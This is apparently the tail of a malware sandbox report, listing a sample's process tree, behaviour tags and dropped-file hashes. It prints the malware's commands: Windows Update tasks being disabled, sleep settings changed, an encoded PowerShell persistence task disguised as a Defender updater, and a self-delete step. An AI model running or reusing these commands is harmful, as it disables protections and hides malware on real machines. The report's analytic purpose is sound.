C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE8⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE8⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE8⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE8⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE8⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE8⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 07⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 08⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 08⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 08⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 08⤵
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe7⤵
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAcQAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwBwAG8AdwBlAHIAcwBoAGUAbABsACcAIAAtAEEAcgBnAHUAbQBlAG4AdAAgACcALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAiAFAAQQBBAGoAQQBIAGcAQQBjAHcAQQBqAEEARAA0AEEASQBBAEIAVABBAEgAUQBBAFkAUQBCAHkAQQBIAFEAQQBMAFEAQgBRAEEASABJAEEAYgB3AEIAagBBAEcAVQBBAGMAdwBCAHoAQQBDAEEAQQBMAFEAQgBHAEEARwBrAEEAYgBBAEIAbABBAEYAQQBBAFkAUQBCADAAQQBHAGcAQQBJAEEAQQBuAEEARQBNAEEATwBnAEIAYwBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEASQBBAEIARwBBAEcAawBBAGIAQQBCAGwAQQBIAE0AQQBYAEEAQgBFAEEARwBVAEEAWgBnAEIAbABBAEcANABBAFoAQQBCAGwAQQBIAEkAQQBYAEEAQgAxAEEASABBAEEAWgBBAEIAaABBAEgAUQBBAFoAUQBCAHkAQQBDADQAQQBaAFEAQgA0AEEARwBVAEEASgB3AEEAZwBBAEMAMABBAFYAZwBCAGwAQQBIAEkAQQBZAGcAQQBnAEEARgBJAEEAZABRAEIAdQBBAEUARQBBAGMAdwBBAGcAQQBEAHcAQQBJAHcAQgA0AEEARwA4AEEASQB3AEEAKwBBAEEAPQA9ACIAJwApACAAPAAjAHUAZABmACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAcwBvAHIAIwA+ACAALQBTAGUAdAB0AGkAbgBnAHMAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAEEAbABsAG8AdwBTAHQAYQByAHQASQBmAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABpAHMAYQBsAGwAbwB3AEgAYQByAGQAVABlAHIAbQBpAG4AYQB0AGUAIAAtAEQAbwBuAHQAUwB0AG8AcABJAGYARwBvAGkAbgBnAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABvAG4AdABTAHQAbwBwAE8AbgBJAGQAbABlAEUAbgBkACAALQBFAHgAZQBjAHUAdABpAG8AbgBUAGkAbQBlAEwAaQBtAGkAdAAgACgATgBlAHcALQBUAGkAbQBlAFMAcABhAG4AIAAtAEQAYQB5AHMAIAAxADAAMAAwACkAKQAgADwAIwB3AGQAcAB5ACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBXAGkAbgBkAG8AdwBzAEQAZQBmAGUAbgBkAGUAcgBVAHAAZABhAHQAZQAnACAALQBVAHMAZQByACAAJwBTAHkAcwB0AGUAbQAnACAALQBSAHUAbgBMAGUAdgBlAGwAIAAnAEgAaQBnAGgAZQBzAHQAJwAgAC0ARgBvAHIAYwBlACAAPAAjAHIAZgB6ACMAPgA7ACAAQwBvAHAAeQAtAEkAdABlAG0AIAAnAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIALgBlAHgAZQAnACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABEAGUAZgBlAG4AZABlAHIAXAB1AHAAZABhAHQAZQByAC4AZQB4AGUAJwAgAC0ARgBvAHIAYwBlACAAPAAjAGUAagBwAG8AIwA+ADsAIABTAHQAYQByAHQALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAAPAAjAGsAYgBkAG4AIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByAFUAcABkAGEAdABlACcAOwA="7⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Windows Defender.exe"7⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 38⤵
-
C:\Users\Admin\AppData\Local\svchost.exe"C:\Users\Admin\AppData\Local\svchost.exe"5⤵
- Enumerates VirtualBox DLL files
- Looks for VirtualBox drivers on disk
- Looks for VirtualBox executables on disk
- Executes dropped EXE
- Looks for VMWare drivers on disk
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\InstallAppUpdates\update.exe"C:\Users\Admin\AppData\Roaming\InstallAppUpdates\update.exe"6⤵
- Enumerates VirtualBox DLL files
- Looks for VirtualBox drivers on disk
- Looks for VirtualBox executables on disk
- Executes dropped EXE
- Looks for VMWare drivers on disk
- Drops startup file
-
C:\Users\Admin\AppData\Local\Temp\Windows.exe"C:\Users\Admin\AppData\Local\Temp\Windows.exe"4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Company\NewProduct\EU1.exe"C:\Program Files (x86)\Company\NewProduct\EU1.exe"3⤵
- Executes dropped EXE
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s CryptSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s StateRepository1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s Dnscache1⤵
-
C:\Windows\system32\ApplicationFrameHost.exeC:\Windows\system32\ApplicationFrameHost.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\Company\NewProduct\EU1.exeFilesize
289KB
MD598ee616bbbdae32bd744f31d48e46c72
SHA1fb2fe19e8890c7c4be116db78254fe3e1beb08a0
SHA2565e0e8817946e234867eb10b92ce613a12d1597ca53e73020ec19e1c76b3566cb
SHA512fab7fc5c37551ca64daad4611b62d456ed245946298f1b813120ca0fe45ffb76c29ec8402327e58c565fdf42f2b1d0bd18864b4ab63f85742e2b99772981af9d
-
C:\Program Files (x86)\Company\NewProduct\EU1.exeFilesize
289KB
MD598ee616bbbdae32bd744f31d48e46c72
SHA1fb2fe19e8890c7c4be116db78254fe3e1beb08a0
SHA2565e0e8817946e234867eb10b92ce613a12d1597ca53e73020ec19e1c76b3566cb
SHA512fab7fc5c37551ca64daad4611b62d456ed245946298f1b813120ca0fe45ffb76c29ec8402327e58c565fdf42f2b1d0bd18864b4ab63f85742e2b99772981af9d
-
C:\Program Files (x86)\Company\NewProduct\F0geI.exeFilesize
178KB
MD58d24da259cd54db3ede2745724dbedab
SHA196f51cc49e1a6989dea96f382f2a958f488662a9
SHA25642f46c886e929d455bc3adbd693150d16f94aa48b050cfa463e399521c50e883
SHA512ec005a5ae8585088733fb692d78bbf2ff0f4f395c4b734e9d3bed66d6a73c2ee24c02da20351397768f2420c703ad47ffee785a2a2af455a000ab0e6620ec536
-
C:\Program Files (x86)\Company\NewProduct\F0geI.exeFilesize
178KB
MD58d24da259cd54db3ede2745724dbedab
SHA196f51cc49e1a6989dea96f382f2a958f488662a9
SHA25642f46c886e929d455bc3adbd693150d16f94aa48b050cfa463e399521c50e883
SHA512ec005a5ae8585088733fb692d78bbf2ff0f4f395c4b734e9d3bed66d6a73c2ee24c02da20351397768f2420c703ad47ffee785a2a2af455a000ab0e6620ec536
-
C:\Program Files (x86)\Company\NewProduct\MouseAtHome.exeFilesize
107KB
MD541e7c847d8834ad0cfaea592afa75efd
SHA1cd96962e2380d721c16c1a80d698e91b358d9381
SHA2562f8315b053c200047ea8a92e138b0ed39ef86f3ed41d17eee1cf281f3f0ad1fa
SHA5125eefeace1b4192edc12eefe0c4c7a99d75f8a2a7721cd320fad6eff2bd70a24d593c67ac4b40899f719f5becbf2880fb2e5453009f39a5e1e348adb1867885b0
-
C:\Program Files (x86)\Company\NewProduct\MouseAtHome.exeFilesize
107KB
MD541e7c847d8834ad0cfaea592afa75efd
SHA1cd96962e2380d721c16c1a80d698e91b358d9381
SHA2562f8315b053c200047ea8a92e138b0ed39ef86f3ed41d17eee1cf281f3f0ad1fa
SHA5125eefeace1b4192edc12eefe0c4c7a99d75f8a2a7721cd320fad6eff2bd70a24d593c67ac4b40899f719f5becbf2880fb2e5453009f39a5e1e348adb1867885b0
-
C:\Program Files (x86)\Company\NewProduct\jshainx.exeFilesize
107KB
MD52647a5be31a41a39bf2497125018dbce
SHA1a1ac856b9d6556f5bb3370f0342914eb7cbb8840
SHA25684c7458316adf09943e459b4fb1aa79bd359ec1516e0ad947f44bdc6c0931665
SHA51268f70140af2ad71a40b6c884627047cdcbc92b4c6f851131e61dc9db3658bde99c1a09cad88c7c922aa5873ab6829cf4100dc12b75f237b2465e22770657ae26
-
C:\Program Files (x86)\Company\NewProduct\jshainx.exeFilesize
107KB
MD52647a5be31a41a39bf2497125018dbce
SHA1a1ac856b9d6556f5bb3370f0342914eb7cbb8840
SHA25684c7458316adf09943e459b4fb1aa79bd359ec1516e0ad947f44bdc6c0931665
SHA51268f70140af2ad71a40b6c884627047cdcbc92b4c6f851131e61dc9db3658bde99c1a09cad88c7c922aa5873ab6829cf4100dc12b75f237b2465e22770657ae26
-
C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exeFilesize
496KB
MD58f5056a3da7c93b60a5c0a9a9c26242c
SHA1c67ee1d7e81f46a5c08b45dca6eb354af1ee7b8c
SHA2568a631481dec5c4bfde1b90e812868a5edd093f44ebbb0625f91e6548c500ef67
SHA512617a6d8c6f3d0497503f6a15bb53623638df98b6ffed7cdaf6d1af8a327f3043f8a04e491e98bbc123740cb2e7c63caf58d93c00ecfe4e60e9460942e98747f8
-
C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exeFilesize
496KB
MD58f5056a3da7c93b60a5c0a9a9c26242c
SHA1c67ee1d7e81f46a5c08b45dca6eb354af1ee7b8c
SHA2568a631481dec5c4bfde1b90e812868a5edd093f44ebbb0625f91e6548c500ef67
SHA512617a6d8c6f3d0497503f6a15bb53623638df98b6ffed7cdaf6d1af8a327f3043f8a04e491e98bbc123740cb2e7c63caf58d93c00ecfe4e60e9460942e98747f8
-
C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeFilesize
245KB
MD5b16134159e66a72fb36d93bc703b4188
SHA1e869e91a2b0f77e7ac817e0b30a9a23d537b3001
SHA256b064af166491cb307cfcb9ce53c09696d9d3f6bfa65dfc60b237c275be9b655c
SHA5123fdf205ca16de89c7ed382ed42f628e1211f3e5aff5bf7dedc47927f3dd7ff54b0dd10b4e8282b9693f45a5ee7a26234f899d14bfd8eb0fd078b42a4ed8b8b4c
-
C:\Program Files (x86)\Company\NewProduct\namdoitntn.exeFilesize
245KB
MD5b16134159e66a72fb36d93bc703b4188
SHA1e869e91a2b0f77e7ac817e0b30a9a23d537b3001
SHA256b064af166491cb307cfcb9ce53c09696d9d3f6bfa65dfc60b237c275be9b655c
SHA5123fdf205ca16de89c7ed382ed42f628e1211f3e5aff5bf7dedc47927f3dd7ff54b0dd10b4e8282b9693f45a5ee7a26234f899d14bfd8eb0fd078b42a4ed8b8b4c
-
C:\Program Files (x86)\Company\NewProduct\real.exeFilesize
289KB
MD584d016c5a9e810c2ef08767805a87589
SHA1750b15c9c1acdfcd1396ecec11ab109706a945ad
SHA2566e8bae93bead10d8778a8f442828aac20a0bd5c87cabe3f6d76282a9d47b7845
SHA5127c612dd0f3eab6cb602c12390f62daa0e75d83433bcd4b682d1d5b931ebc52c8f6b32acd12474bdf6eecb91541dfa11cbbd57ca6cf8297ae9c407923e4d95953
-
C:\Program Files (x86)\Company\NewProduct\real.exeFilesize
289KB
MD584d016c5a9e810c2ef08767805a87589
SHA1750b15c9c1acdfcd1396ecec11ab109706a945ad
SHA2566e8bae93bead10d8778a8f442828aac20a0bd5c87cabe3f6d76282a9d47b7845
SHA5127c612dd0f3eab6cb602c12390f62daa0e75d83433bcd4b682d1d5b931ebc52c8f6b32acd12474bdf6eecb91541dfa11cbbd57ca6cf8297ae9c407923e4d95953
-
C:\Program Files (x86)\Company\NewProduct\safert44.exeFilesize
244KB
MD5dbe947674ea388b565ae135a09cc6638
SHA1ae8e1c69bd1035a92b7e06baad5e387de3a70572
SHA25686aeac2a4ee8e62265ee570718bbd41a4e643e0bad69e7b4fa6c24baeb220709
SHA51267441aebbf7ce4d53fbb665124f309faed7842b3e424e018454ff6d6f790219633ce6a9b370aeaf77c5092e84f4391df13e964ca6a28597810dee41c3c833893
-
C:\Program Files (x86)\Company\NewProduct\safert44.exeFilesize
244KB
MD5dbe947674ea388b565ae135a09cc6638
SHA1ae8e1c69bd1035a92b7e06baad5e387de3a70572
SHA25686aeac2a4ee8e62265ee570718bbd41a4e643e0bad69e7b4fa6c24baeb220709
SHA51267441aebbf7ce4d53fbb665124f309faed7842b3e424e018454ff6d6f790219633ce6a9b370aeaf77c5092e84f4391df13e964ca6a28597810dee41c3c833893
-
C:\Program Files (x86)\Company\NewProduct\tag.exeFilesize
107KB
MD52ebc22860c7d9d308c018f0ffb5116ff
SHA178791a83f7161e58f9b7df45f9be618e9daea4cd
SHA2568e2c9fd68fc850fa610d1edfd46fc4a66adbef24e42a1841290b0e0c08597e89
SHA512d4842627f6fab09f9472ed0b09b5e012524bf6b821d90a753275f68de65b7ba084a9e15daca58a183f89b166cc9d2d2f2d6a81e1110e66c5822b548279c8c05e
-
C:\Program Files (x86)\Company\NewProduct\tag.exeFilesize
107KB
MD52ebc22860c7d9d308c018f0ffb5116ff
SHA178791a83f7161e58f9b7df45f9be618e9daea4cd
SHA2568e2c9fd68fc850fa610d1edfd46fc4a66adbef24e42a1841290b0e0c08597e89
SHA512d4842627f6fab09f9472ed0b09b5e012524bf6b821d90a753275f68de65b7ba084a9e15daca58a183f89b166cc9d2d2f2d6a81e1110e66c5822b548279c8c05e
-
C:\Program Files\Defender\updater.exeFilesize
4.9MB
MD514534cb24128c15a2d6c1dac1b11af55
SHA133dc4dac54e1adc5979a3fc732432e6d09a0c8c4
SHA2564eefc4f042a6570cfbdbaca40622dad3c81b5c63ee039835ec41414569494d62
SHA512609a0d51a970de923b6de0b128eb452dc9177a70fd78d269287506bbad877194a8c4a66b6a0717bc0486e11ddda6aa94a6152a83d19ae83889e5725a2e7920a7
-
C:\Program Files\Defender\updater.exeFilesize
4.9MB
MD514534cb24128c15a2d6c1dac1b11af55
SHA133dc4dac54e1adc5979a3fc732432e6d09a0c8c4
SHA2564eefc4f042a6570cfbdbaca40622dad3c81b5c63ee039835ec41414569494d62
SHA512609a0d51a970de923b6de0b128eb452dc9177a70fd78d269287506bbad877194a8c4a66b6a0717bc0486e11ddda6aa94a6152a83d19ae83889e5725a2e7920a7
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2AB7.tmp.csvFilesize
41KB
MD59edc87afcc1e728fa7da75e0adeca243
SHA19c51da77ae171fdc6bc6cecc5fdc87662172b496
SHA2568fa68970ffd4b18e111b768962171aa3f7f79ad096fb3c32ff1d528ce2975b27
SHA5124c0242d6254f1e88fd37cbe44ae7b82a45da5af7d07acb67c52f06d62c0bdab9c5ee02966b4c4309007f56bfeca3fce376d0a3acd79e753ed1eb967dad87b96a
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2AD7.tmp.txtFilesize
12KB
MD5a1eb9c26aa8471c1d0f86fbb0f4ff83e
SHA148b4d3bfd7e9acc6cc7edf8ef134786601b7abda
SHA2560e491e39e27b39b73e3c023bd30c6c15fff87db6bfa26845a6a9b80b91ec2065
SHA51259f84b6b017c509353df1714213e6f003358ca2eb41e9684b8163ec9bbaa591cd090260c62a7ce7041152b5aaa024e31c32438ce7d27089c09ddaf68984862d2
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2D1A.tmp.csvFilesize
39KB
MD57bee6f0305372bb0f371ebe1b1c1ea6e
SHA1c4611aadce56bd81004ab4afe15521a97f31d11d
SHA256a787bf4dfd5fec8aece73de146797537c262f3b9c285689b99e86948aab7d98d
SHA512e8d422cbcfee6e411e30bc9fb49e37cceae69cc8f8990074c6fd62c6868e3168fe003e118677bfc96dcf19b2222f3a20d6f3a045b05097702574a6b4079d9882
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2D3A.tmp.txtFilesize
12KB
MD5adfb22bc2aeb9a998fe4ff9bf8350491
SHA139d081751ba1d9d0d1783b3a970b32d55c10ae07
SHA256d7450683ce8b722148e6a4d978f5e109c9df57d1456b90888266724165679fcc
SHA5124aa8aa5c67f56c23e23a17775cbd78fd9a246ba342cbd3c475617aa73afe94bb997c0800aa981bc296e9c403da18acbcffadb37c612d0a6f30aea0a5c48bb34d
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5900713b658f108100bb7aa144134dbca
SHA17a05dd4d5cd03542c5187c8a3036f30b9d79daf0
SHA256c59ad3c5b09e5adab5c6d20e70fc87edce830a1e696ea2b49b51fe99ae084da8
SHA51285a5b109a01035e1ac4dec839f6b84bd6a141c6938e51f78915748a9a593b011367f1d8c7c72060a986f993ca3206fde30929b18be8d51d60cc1525a73613f8d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5a7885e1b92464320f2689e44d78ddbdf
SHA1064eb9c538e52b11e70522c2fd3089df8bb5f59b
SHA2562089f1529a617b107ba27dcaf0e3a79726ae0f0074907d772ed2e63126467ae1
SHA512d7778b574171093e16422e5f9d7321fbfbf392cca2c76ac22b4a6b8ff8f27e9c50d9525a7a2e7bb0611a1553e1c980fadd4d9735d43cf083298854d32ea88da2
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD55b20356b92d05d61f036769cdf2f7bbf
SHA195f9b464be449714747776934fa55bb5bf622795
SHA256223d2ebeb965a165d8267e955b2d970202f3a524f6f64c559eb5a9e75bb973a3
SHA512f046d4e812f238f8533dcb7c18e39defc5b6bd9bca644cb43362af9904aa8f4d22b00285d7985c8e955dacfaa24f24b654e66ef7e000b38729d49fedecb38411
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD598b0666d5f8e951f05374dbb3bdfda27
SHA1f92fb138fc6ca583ddad18e160803e0a5ab74f8b
SHA2566c64618ccb09c74a2d240301f38fb5d8f2f7fd8a651200f986595e09807308b1
SHA5120c6fd899c13dcd146b08e6f87f24103e6d2d608fc6bce35ca59d1738fec238999c1d3f5a1234bb7bd95a9d0340d0934ad0232269e677bbcd78267a27f1068eae
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\03C0QDVU.cookieFilesize
336B
MD5f3939a68392e952fb3944ece4dc1fa38
SHA1e75f3d18be36aaa3b1cf6f4a156ea2027a3b7017
SHA25660b0113ad3fd24d89ef04e2ef294f3abf6ab5847797ca0ae492ac3c4faaa5ad2
SHA5124f8f31a648ffce53ff7694380bfdd1f0696154c15702db26b9c84d7cf67d841df75ddeb9930072fb4260b935afe8e4dd2b44a953bcd78680267d7142316df214
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\6U04SFHO.cookieFilesize
253B
MD5f28a5484342b90f180832764cc4a7b67
SHA16dc2f1d235b199450e116b2949360d151c042ae5
SHA2566ade4a7376988a7797a46306a61956130b9e38711b63e02da74a9e1ab6aa3d43
SHA5124f34703c7690ad1b8938cec20589fe5de4acef80ce19af2b9f32518c6fb7d5a93a208239cd329ffd379f793a1a33a31216bb9e34851b59125b859a4849afb3c7
-
C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\7EVD638G.cookieFilesize
419B
MD5453203084017209fa15639356e82bc8f
SHA18a1abac313b7c0ba1ee35e51a9516f0d9202bdb3
SHA256c267b6adb68a45789d0b64db5214577f841a4051c919d14adf9643ba00e1b4cc
SHA5129ecc1390c5bc38e3031034a2cefa7d9290370dabf549b1e1de50bdc79606d3b7ba6c622f91a11cd222d458677d3d01c192e45de371b92995dff45b4a6a68376d
-
